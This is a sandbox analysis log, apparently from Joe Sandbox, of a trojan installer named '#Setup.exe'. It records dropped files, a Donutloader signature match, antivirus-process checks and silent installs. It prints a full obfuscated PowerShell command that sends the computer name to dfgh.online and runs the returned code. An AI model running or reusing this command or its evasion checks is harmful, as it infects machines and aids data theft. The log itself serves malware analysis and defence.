Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_0295D959	0_2_0295D959
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_0295A974	0_2_0295A974
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_0296B974	0_2_0296B974
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02990E84	0_2_02990E84
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02957ED4	0_2_02957ED4
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_0295CEFF	0_2_0295CEFF
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02988E14	0_2_02988E14
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02987E56	0_2_02987E56
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02959E64	0_2_02959E64
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_0295DF97	0_2_0295DF97
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_0295BFF4	0_2_0295BFF4
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02983F24	0_2_02983F24
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02958CB4	0_2_02958CB4
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_0296EC04	0_2_0296EC04
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_0296BC44	0_2_0296BC44
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_0295EC46	0_2_0295EC46
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02970DDC	0_2_02970DDC
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_0295ADE4	0_2_0295ADE4
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_0295FDE4	0_2_0295FDE4
Source: C:\Users\user\Desktop\#Setup.exe	Code function: 0_2_02992D1C	0_2_02992D1C

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe 16E037D7B5F6A8E02B73671E1214B7979EB5D0AB0FC1106CF4C321F0FF53E13A
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\is-DTHVM.tmp\_isetup\_isdecmp.dll 31D04C1E4BFDFA34704C142FA98F80C0A3076E4B312D6ADA57C4BE9D9C7DCF26

Source: C:\Users\user\Desktop\#Setup.exe	Code function: String function: 02959844 appears 75 times
Source: C:\Users\user\Desktop\#Setup.exe	Code function: String function: 02965864 appears 73 times

Source: #Setup.exe

Static PE information: invalid certificate

Source: #Setup.exe	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #Setup.exe	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp.7.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp.10.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows

Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp.7.dr	Static PE information: Number of sections : 11 > 10
Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.exe.0.dr	Static PE information: Number of sections : 11 > 10
Source: EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp.10.dr	Static PE information: Number of sections : 11 > 10

Source: #Setup.exe, 00000000.00000003.2376713748.0000000003CFD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFileNameColorStreamLib.exe vs #Setup.exe
Source: #Setup.exe, 00000000.00000000.2115088958.0000000000530000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs #Setup.exe
Source: #Setup.exe, 00000000.00000003.2200527103.000000000310B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameshfolder.dll~/ vs #Setup.exe
Source: #Setup.exe	Binary or memory string: OriginalFilenameshfolder.dll~/ vs #Setup.exe

Source: #Setup.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI

Source: 00000000.00000002.2436139986.0000000002950000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@59/13@4/3

Source: C:\Users\user\Desktop\#Setup.exe

Code function: 0_2_02950B27 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,CloseHandle,

0_2_02950B27

Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp

File created: C:\Users\user\AppData\Roaming\ColorStreamLib

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6420:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5280:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1088:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:572:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7092:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4032:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1672:120:WilError_03

Source: C:\Users\user\Desktop\#Setup.exe

File created: C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe

Jump to behavior

Source: C:\Users\user\Desktop\#Setup.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'OPSSVC.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVASTUI.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'AVGUI.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'NSWSCSVC.EXE'
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'SOPHOSHEALTH.EXE'

Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\#Setup.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization

Jump to behavior

Source: tasklist.exe, 00000010.00000002.2850293965.00000241CF305000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'WRSA.EXE';
Source: #Setup.exe, 00000000.00000003.2238282148.00000000037E0000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2226192752.00000000037CA000.00000004.00000800.00020000.00000000.sdmp, #Setup.exe, 00000000.00000003.2226361097.00000000037AD000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: #Setup.exe	String found in binary or memory: -Helper process exited with failure code: 0x%x
Source: #Setup.exe	String found in binary or memory: -HelperRegisterTypeLibrary: StatusCode invalidU
Source: #Setup.exe	String found in binary or memory: /LoadInf=
Source: #Setup.exe	String found in binary or memory: /InstallOnThisVersion: Invalid MinVersion string

Source: C:\Users\user\Desktop\#Setup.exe

File read: C:\Users\user\Desktop\#Setup.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\#Setup.exe "C:\Users\user\Desktop\#Setup.exe"
Source: C:\Users\user\Desktop\#Setup.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#Setup.exe	Process created: C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe "C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe"
Source: C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe	Process created: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp "C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp" /SL5="$2043C,7785838,845824,C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe"
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process created: C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe "C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe	Process created: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp "C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp" /SL5="$3043C,7785838,845824,C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process created: C:\Windows\System32\timeout.exe "timeout" 9
Source: C:\Windows\System32\timeout.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH \| find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH \| find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH \| find /I "avastui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH \| find /I "avgui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH \| find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH \| find /I "sophoshealth.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
Source: C:\Users\user\Desktop\#Setup.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Process created: C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe "C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe	Process created: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp "C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp" /SL5="$2043C,7785838,845824,C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-JCFFE.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process created: C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe "C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe	Process created: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp "C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp" /SL5="$3043C,7785838,845824,C:\Users\user\AppData\Local\Temp\EZLBPQ4AXUTIKRAZAYNGFI8TD.exe" /VERYSILENT	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process created: C:\Windows\System32\timeout.exe "timeout" 9	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH \| find /I "wrsa.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH \| find /I "opssvc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH \| find /I "avastui.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH \| find /I "avgui.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH \| find /I "nswscsvc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH \| find /I "sophoshealth.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VPP5J.tmp\EZLBPQ4AXUTIKRAZAYNGFI8TD.tmp	Process created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"

Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\#Setup.exe	Section loaded: apphelp.dll	Jump to behavior
